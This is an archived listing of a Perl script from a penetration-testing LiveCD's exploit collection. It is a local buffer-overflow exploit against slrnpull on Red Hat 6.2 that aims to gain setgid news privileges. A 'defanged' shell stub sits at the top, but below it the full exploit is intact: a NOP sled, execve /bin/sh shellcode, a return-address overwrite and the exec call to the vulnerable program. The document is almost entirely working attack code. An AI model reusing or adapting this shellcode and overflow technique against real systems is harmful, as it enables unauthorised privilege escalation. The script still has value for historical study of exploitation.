home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / livecd.squashfs / opt / pentoo / ExploitTree / system / linux / local / slrnpull-ex.pl < prev    next >
Encoding:
Perl Script  |  2005-02-12  |  817 b   |  31 lines
  1. #!/bin/sh
  2. echo DEFANGED.5
  3. exit
  4. #!/usr/bin/perl
  5. #
  6. # Credits for the vulnerability: Alex Hernandez (its setgid news not root)
  7. # The exploit was written by:    zillion@snosoft.com / safemode.org
  8. # http://www.safemode.org 
  9. # http://www.snosoft.com
  10. #
  11. # Gain setgid news on a Red Hat 6.2 Intel box
  12.  
  13. $shellcode = 
  14.         "\xeb\x1a\x5e\x31\xc0\x88\x46\x07\x8d\x1e\x89\x5e\x08\x89\x46".
  15.         "\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xe8\xe1".
  16.         "\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68";
  17.  
  18. $offset  = "-500"; 
  19. $esp     = 0xbfffe2cc;
  20.  
  21. for ($i = 0; $i < (2041 - (length($shellcode)) - 4); $i++) {
  22.     $buffer .= "\x90";
  23. }
  24.  
  25. $buffer .= $shellcode;
  26. $buffer .= pack('l', ($esp + $offset)); 
  27.  
  28. print("The new return address: 0x", sprintf('%lx',($esp + $offset)), "\n");
  29.  
  30. exec("/usr/bin/slrnpull -d '$buffer'");
  31.